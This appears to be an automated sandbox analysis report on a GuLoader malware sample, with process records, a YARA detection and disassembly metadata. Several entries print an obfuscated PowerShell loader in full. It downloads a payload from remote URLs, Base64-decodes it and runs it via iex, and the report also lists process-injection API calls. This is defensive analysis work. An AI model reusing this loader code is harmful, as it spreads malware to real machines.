i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                        Imagebase:0x70000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:11
                                                        Start time:07:31:11
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:12
                                                        Start time:07:31:12
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:07:31:34
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                        Imagebase:0x70000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.3375923464.000000000AC25000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:false

                                                        General

                                                        Target ID:15
                                                        Start time:07:31:34
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:14
                                                          Total number of Limit Nodes:0
                                                          execution_graph 5166 7ff848f063d3 5167 7ff848f063e5 5166->5167 5169 7ff848f064e8 5167->5169 5170 7ff848f0c442 CreateProcessA 5167->5170 5171 7ff848f0c4b6 5170->5171 5171->5169 5172 7ff848f0b14d 5173 7ff848f0b15b ResumeThread 5172->5173 5175 7ff848f0b252 5173->5175 5176 7ff848f0bb2d 5177 7ff848f0bb3b WriteProcessMemory 5176->5177 5179 7ff848f0bcb8 5177->5179 5180 7ff848f0b2a5 5181 7ff848f0b2b3 Wow64SetThreadContext 5180->5181 5183 7ff848f0b3e8 5181->5183

                                                          Executed Functions

                                                          Function 00007FF848FD2CFC Relevance: .7, Instructions: 731COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 194 7ff848fd2cfc-7ff848fd2d10 195 7ff848fd2d12-7ff848fd2d14 194->195 196 7ff848fd2d3e-7ff848fd2d8a 194->196 199 7ff848fd2d90-7ff848fd2d9a 196->199 200 7ff848fd2f3a-7ff848fd2f96 196->200 201 7ff848fd2db3-7ff848fd2db8 199->201 202 7ff848fd2d9c-7ff848fd2db1 199->202 224 7ff848fd2fc1-7ff848fd2feb 200->224 225 7ff848fd2f98-7ff848fd2fbf 200->225 204 7ff848fd2ed3-7ff848fd2edd 201->204 205 7ff848fd2dbe-7ff848fd2dc1 201->205 202->201 210 7ff848fd2eee-7ff848fd2f37 204->210 211 7ff848fd2edf-7ff848fd2eed 204->211 207 7ff848fd2dc3-7ff848fd2dd6 205->207 208 7ff848fd2dd8 205->208 216 7ff848fd2dda-7ff848fd2ddc 207->216 208->216 210->200 216->204 218 7ff848fd2de2-7ff848fd2de5 216->218 221 7ff848fd2de7-7ff848fd2df0 218->221 222 7ff848fd2dfc-7ff848fd2e00 218->222 221->222 222->204 227 7ff848fd2e06-7ff848fd2e09 222->227 241 7ff848fd2ff2-7ff848fd3003 224->241 242 7ff848fd2fed 224->242 225->224 230 7ff848fd2e20 227->230 231 7ff848fd2e0b-7ff848fd2e1e 227->231 235 7ff848fd2e22-7ff848fd2e24 230->235 231->235 235->204 236 7ff848fd2e2a-7ff848fd2e30 235->236 239 7ff848fd2e32-7ff848fd2e3f 236->239 240 7ff848fd2e4c-7ff848fd2e59 236->240 239->240 248 7ff848fd2e41-7ff848fd2e4a 239->248 252 7ff848fd2e6d-7ff848fd2e7d 240->252 253 7ff848fd2e5b-7ff848fd2e6c 240->253 245 7ff848fd3005 241->245 246 7ff848fd300a-7ff848fd300b 241->246 242->241 244 7ff848fd2fef 242->244 244->241 245->246 249 7ff848fd3007 245->249 250 7ff848fd304d-7ff848fd3097 246->250 251 7ff848fd300d-7ff848fd301b 246->251 248->240 249->246 262 7ff848fd31ef-7ff848fd320d 250->262 264 7ff848fd309d-7ff848fd30a7 250->264 254 7ff848fd31d1-7ff848fd31ec 251->254 258 7ff848fd2e91-7ff848fd2eaa 252->258 259 7ff848fd2e7f-7ff848fd2e90 252->259 253->252 254->262 269 7ff848fd2ec3-7ff848fd2ed2 258->269 270 7ff848fd2eac-7ff848fd2eb9 258->270 259->258 272 7ff848fd320e-7ff848fd321a 262->272 266 7ff848fd30c3-7ff848fd30d0 264->266 267 7ff848fd30a9-7ff848fd30c1 264->267 278 7ff848fd30d6-7ff848fd30d9 266->278 279 7ff848fd3190-7ff848fd319a 266->279 267->266 270->269 276 7ff848fd2ebb-7ff848fd2ec1 270->276 280 7ff848fd321c-7ff848fd3249 272->280 276->269 278->279 283 7ff848fd30df-7ff848fd30e7 278->283 281 7ff848fd319c-7ff848fd31a8 279->281 282 7ff848fd31a9-7ff848fd31cf 279->282 297 7ff848fd3274-7ff848fd32a1 280->297 298 7ff848fd324b-7ff848fd3272 280->298 282->254 283->262 284 7ff848fd30ed-7ff848fd30f7 283->284 288 7ff848fd3110-7ff848fd3114 284->288 289 7ff848fd30f9-7ff848fd310e 284->289 288->279 292 7ff848fd3116-7ff848fd3119 288->292 289->288 295 7ff848fd3130-7ff848fd3134 292->295 296 7ff848fd311b-7ff848fd3124 292->296 295->279 304 7ff848fd3136-7ff848fd313c 295->304 296->295 311 7ff848fd32a4-7ff848fd32b5 297->311 312 7ff848fd32a3 297->312 298->297 305 7ff848fd313e-7ff848fd3151 304->305 306 7ff848fd315b 304->306 318 7ff848fd3158-7ff848fd3159 305->318 310 7ff848fd3160-7ff848fd3169 306->310 314 7ff848fd3182-7ff848fd318f 310->314 315 7ff848fd316b-7ff848fd3178 310->315 316 7ff848fd32b7 311->316 317 7ff848fd32b8-7ff848fd349c 311->317 312->311 315->314 321 7ff848fd317a-7ff848fd3180 315->321 316->317 318->306 321->314
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f53edea29e8216ecb26cef912c01362c69ef5938cd5dfcf889eb16dcefea05de
                                                          • Instruction ID: 5a3ac1fde99e31f2293dc9ce8744f06610ff4df1562c1af68ab0adcbb74c1109
                                                          • Opcode Fuzzy Hash: f53edea29e8216ecb26cef912c01362c69ef5938cd5dfcf889eb16dcefea05de
                                                          • Instruction Fuzzy Hash: E0227732E0DA8A4FE796A72C58551B47BE1EF56360F0801FBC14EC71D3EE28AC068795
                                                          Function 00007FF848F0C442 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 148processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: [6q;
                                                          • API String ID: 963392458-2592173838
                                                          • Opcode ID: c22e5e59fb6467f07d5ca00d7c8b96a754f7d09e6c6138e696d91e39a6684ac6
                                                          • Instruction ID: 104266eff0f85a62b1b4e31d704afa14da3cb3473ce47198c145a799f3ddcd76
                                                          • Opcode Fuzzy Hash: c22e5e59fb6467f07d5ca00d7c8b96a754f7d09e6c6138e696d91e39a6684ac6
                                                          • Instruction Fuzzy Hash: 3E416A34919A4D8FEBA4EF18D885BF977E0FF59350F10412AD80DC7292DB38A640CB94
                                                          Function 00007FF848F0BB2D Relevance: 1.7, APIs: 1, Instructions: 214injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 902627ed9892a2ef908c4122d6c6c921115f5e7d4047cca08698fb0d3b8fd52b
                                                          • Instruction ID: 2aeec7f44a6933fc4325f23de359bd94fd91ed9b461571b1e4c36e7e8f85a682
                                                          • Opcode Fuzzy Hash: 902627ed9892a2ef908c4122d6c6c921115f5e7d4047cca08698fb0d3b8fd52b
                                                          • Instruction Fuzzy Hash: F4615970908A5D8FDB94DF68C885BE9BBF1FB69311F1082AAD44CE3255DB34A985CF40
                                                          Function 00007FF848F0B2A5 Relevance: 1.7, APIs: 1, Instructions: 182threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 2b73867eba536dbc056cf3230a0f921d8070c274eca0c13e2c17059faec4da45
                                                          • Instruction ID: 00d6ba906c69e1b9f4d3089f00fb65d75f637c11fccc4d7f22685785c1a53ff8
                                                          • Opcode Fuzzy Hash: 2b73867eba536dbc056cf3230a0f921d8070c274eca0c13e2c17059faec4da45
                                                          • Instruction Fuzzy Hash: 4B51487090864C8FEB54DFA8C849BEDBBF1FB59311F10826AD048E7256DB74A885CF40
                                                          Function 00007FF848F0B14D Relevance: 1.7, APIs: 1, Instructions: 155threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 0fae579a5bb44511571bbe7b0357782370244b8a95211b3ea4dfbcc849ca5cfb
                                                          • Instruction ID: ab4d4602de4a973a69e2c146a2ef53140138f64151f02e44aa9b47b4ae819848
                                                          • Opcode Fuzzy Hash: 0fae579a5bb44511571bbe7b0357782370244b8a95211b3ea4dfbcc849ca5cfb
                                                          • Instruction Fuzzy Hash: 5B518B70D0878C8FDB55DFA8C885AEDBBB0EF56310F1041AAD449E7292DB74A886CB51
                                                          Function 00007FF848FD7540 Relevance: .8, Instructions: 773COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 55 7ff848fd7540-7ff848fd7584 58 7ff848fd7773-7ff848fd77cd 55->58 59 7ff848fd758a-7ff848fd7594 55->59 82 7ff848fd77cf-7ff848fd77f6 58->82 83 7ff848fd77f8-7ff848fd781b 58->83 60 7ff848fd7596-7ff848fd75a3 59->60 61 7ff848fd75ad-7ff848fd75b2 59->61 60->61 67 7ff848fd75a5-7ff848fd75ab 60->67 64 7ff848fd7714-7ff848fd771e 61->64 65 7ff848fd75b8-7ff848fd75bb 61->65 68 7ff848fd7720-7ff848fd772c 64->68 69 7ff848fd772d-7ff848fd7770 64->69 70 7ff848fd75d2-7ff848fd75d6 65->70 71 7ff848fd75bd-7ff848fd75c6 65->71 67->61 69->58 70->64 78 7ff848fd75dc-7ff848fd7613 70->78 71->70 93 7ff848fd7615-7ff848fd7635 78->93 94 7ff848fd7637 78->94 82->83 92 7ff848fd781d-7ff848fd7825 83->92 96 7ff848fd7827 92->96 97 7ff848fd7828-7ff848fd7839 92->97 98 7ff848fd7639-7ff848fd763b 93->98 94->98 96->97 99 7ff848fd783c-7ff848fd784a 97->99 100 7ff848fd783b 97->100 98->64 102 7ff848fd7641-7ff848fd7644 98->102 99->92 104 7ff848fd784c-7ff848fd7897 99->104 100->99 105 7ff848fd7646-7ff848fd7659 102->105 106 7ff848fd765b 102->106 114 7ff848fd7898 104->114 109 7ff848fd765d-7ff848fd765f 105->109 106->109 109->64 111 7ff848fd7665-7ff848fd769f 109->111 123 7ff848fd76a1-7ff848fd76ae 111->123 124 7ff848fd76b8-7ff848fd76be 111->124 114->114 116 7ff848fd7899 114->116 116->114 118 7ff848fd789b-7ff848fd78c9 116->118 121 7ff848fd78cf-7ff848fd78d9 118->121 122 7ff848fd7a18-7ff848fd7a74 118->122 125 7ff848fd78f2-7ff848fd78f7 121->125 126 7ff848fd78db-7ff848fd78f0 121->126 158 7ff848fd7a76-7ff848fd7a9d 122->158 159 7ff848fd7a9f-7ff848fd7ac7 122->159 123->124 138 7ff848fd76b0-7ff848fd76b6 123->138 131 7ff848fd76c0-7ff848fd76d8 124->131 132 7ff848fd76da-7ff848fd76dd 124->132 128 7ff848fd79b5-7ff848fd79bf 125->128 129 7ff848fd78fd-7ff848fd7900 125->129 126->125 134 7ff848fd79d0-7ff848fd7a15 128->134 135 7ff848fd79c1-7ff848fd79cf 128->135 136 7ff848fd7902-7ff848fd7915 129->136 137 7ff848fd7949 129->137 131->132 142 7ff848fd76e4-7ff848fd76ed 132->142 134->122 136->122 156 7ff848fd791b-7ff848fd7925 136->156 141 7ff848fd794b-7ff848fd794d 137->141 138->124 141->128 146 7ff848fd794f-7ff848fd7952 141->146 147 7ff848fd7706-7ff848fd7713 142->147 148 7ff848fd76ef-7ff848fd7704 142->148 146->128 153 7ff848fd7954-7ff848fd795a 146->153 148->147 160 7ff848fd795c-7ff848fd7977 153->160 161 7ff848fd7979-7ff848fd798c 153->161 162 7ff848fd7927-7ff848fd7934 156->162 163 7ff848fd793e-7ff848fd7947 156->163 158->159 180 7ff848fd7ace-7ff848fd7adf 159->180 181 7ff848fd7ac9 159->181 160->161 174 7ff848fd79a5-7ff848fd79b4 161->174 175 7ff848fd798e-7ff848fd799b 161->175 162->163 171 7ff848fd7936-7ff848fd793c 162->171 163->141 171->163 175->174 182 7ff848fd799d-7ff848fd79a3 175->182 184 7ff848fd7ae6-7ff848fd7cb8 180->184 185 7ff848fd7ae1 180->185 181->180 183 7ff848fd7acb 181->183 182->174 183->180 189 7ff848fd7cba-7ff848fd7cca 184->189 190 7ff848fd7ccb-7ff848fd7d16 184->190 185->184 188 7ff848fd7ae3 185->188 188->184
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0f34286c7d7b0cc03fcc80011879db42b1a83e228d90510aaf05aadf86b025b
                                                          • Instruction ID: dce446f2331c8a618ad7ce3a9c56268e7eac5625573d27080c9ef51e480f1343
                                                          • Opcode Fuzzy Hash: c0f34286c7d7b0cc03fcc80011879db42b1a83e228d90510aaf05aadf86b025b
                                                          • Instruction Fuzzy Hash: B7223932E0EE8A4FE395A72858152B57BE1EF56660F1801BBC14ECB1D3EF189C05C796
                                                          Function 00007FF848FD15BE Relevance: .2, Instructions: 246COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8160bcd60e2f44d2843e2f4867ecf257b87536c0c57dee8b9caea1f0e46aa100
                                                          • Instruction ID: c80d61e84b401f0d6593569513061fd67f8bbc2013430203e6d7832a80ebfbbd
                                                          • Opcode Fuzzy Hash: 8160bcd60e2f44d2843e2f4867ecf257b87536c0c57dee8b9caea1f0e46aa100
                                                          • Instruction Fuzzy Hash: A961D17290EBC54FE356A7382868160BFE0EF57690F0901FBD08ACB1E3E9195849C766
                                                          Function 00007FF848FD75CA Relevance: .1, Instructions: 142COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 395 7ff848fd75ca-7ff848fd75d6 397 7ff848fd7714-7ff848fd771e 395->397 398 7ff848fd75dc-7ff848fd7613 395->398 399 7ff848fd7720-7ff848fd772c 397->399 400 7ff848fd772d-7ff848fd77cd 397->400 408 7ff848fd7615-7ff848fd7635 398->408 409 7ff848fd7637 398->409 427 7ff848fd77cf-7ff848fd77f6 400->427 428 7ff848fd77f8-7ff848fd781b 400->428 410 7ff848fd7639-7ff848fd763b 408->410 409->410 410->397 413 7ff848fd7641-7ff848fd7644 410->413 416 7ff848fd7646-7ff848fd7659 413->416 417 7ff848fd765b 413->417 420 7ff848fd765d-7ff848fd765f 416->420 417->420 420->397 422 7ff848fd7665-7ff848fd769f 420->422 435 7ff848fd76a1-7ff848fd76ae 422->435 436 7ff848fd76b8-7ff848fd76be 422->436 427->428 437 7ff848fd781d-7ff848fd7825 428->437 435->436 444 7ff848fd76b0-7ff848fd76b6 435->444 439 7ff848fd76c0-7ff848fd76d8 436->439 440 7ff848fd76da-7ff848fd76dd 436->440 442 7ff848fd7827 437->442 443 7ff848fd7828-7ff848fd7839 437->443 439->440 446 7ff848fd76e4-7ff848fd76ed 440->446 442->443 447 7ff848fd783c-7ff848fd784a 443->447 448 7ff848fd783b 443->448 444->436 449 7ff848fd7706-7ff848fd7713 446->449 450 7ff848fd76ef-7ff848fd7704 446->450 447->437 451 7ff848fd784c-7ff848fd7897 447->451 448->447 450->449 459 7ff848fd7898 451->459 459->459 460 7ff848fd7899 459->460 460->459 461 7ff848fd789b-7ff848fd78c9 460->461 463 7ff848fd78cf-7ff848fd78d9 461->463 464 7ff848fd7a18-7ff848fd7a74 461->464 465 7ff848fd78f2-7ff848fd78f7 463->465 466 7ff848fd78db-7ff848fd78f0 463->466 487 7ff848fd7a76-7ff848fd7a9d 464->487 488 7ff848fd7a9f-7ff848fd7ac7 464->488 468 7ff848fd79b5-7ff848fd79bf 465->468 469 7ff848fd78fd-7ff848fd7900 465->469 466->465 471 7ff848fd79d0-7ff848fd7a15 468->471 472 7ff848fd79c1-7ff848fd79cf 468->472 473 7ff848fd7902-7ff848fd7915 469->473 474 7ff848fd7949 469->474 471->464 473->464 485 7ff848fd791b-7ff848fd7925 473->485 476 7ff848fd794b-7ff848fd794d 474->476 476->468 480 7ff848fd794f-7ff848fd7952 476->480 480->468 483 7ff848fd7954-7ff848fd795a 480->483 489 7ff848fd795c-7ff848fd7977 483->489 490 7ff848fd7979-7ff848fd798c 483->490 491 7ff848fd7927-7ff848fd7934 485->491 492 7ff848fd793e-7ff848fd7947 485->492 487->488 508 7ff848fd7ace-7ff848fd7adf 488->508 509 7ff848fd7ac9 488->509 489->490 502 7ff848fd79a5-7ff848fd79b4 490->502 503 7ff848fd798e-7ff848fd799b 490->503 491->492 499 7ff848fd7936-7ff848fd793c 491->499 492->476 499->492 503->502 510 7ff848fd799d-7ff848fd79a3 503->510 512 7ff848fd7ae6-7ff848fd7cb8 508->512 513 7ff848fd7ae1 508->513 509->508 511 7ff848fd7acb 509->511 510->502 511->508 517 7ff848fd7cba-7ff848fd7cca 512->517 518 7ff848fd7ccb-7ff848fd7d16 512->518 513->512 516 7ff848fd7ae3 513->516 516->512
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
